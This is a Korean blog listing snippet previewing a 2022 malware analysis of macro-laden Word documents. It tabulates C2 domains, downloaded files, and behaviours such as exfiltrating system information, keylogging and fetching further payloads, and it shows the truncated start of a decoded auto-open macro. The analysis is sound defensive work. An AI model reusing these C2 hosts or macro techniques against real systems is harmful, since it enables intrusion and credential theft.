728x90 반응형 C2서버1 악성코드가 포함된 워드문서(doc) 분석 2 [분석 요약표] 연번 C2서버 도메인 다운로드 파일1 악성 행위 다운로드 파일2 악성 행위 1 uyfhk.mypressonline.com li.txt 감염 시스템 정보를 C2서버로 전송 li.down 사용자가 키보드로 입력한 값을 Ahanlab.hwp 파일에 저장 2 3 nskal.myarts online.com op.txt op.down xsiel.mypressonline.com에서 추가 악성파일 settings.dat을 다운로드하여 실행 ○ 문서의 매크로 내용을 확인한 결과, 난독화된 소스코드가 확인되며 문서 2개 모두 동일한 매크로가 확인된다. 디코딩하면 아래와 같다. Private Sub Document_Open() Set djfeihfidkasljf = CreateObject("Shell.App.. 2022. 10. 7. 이전 1 다음 728x90 반응형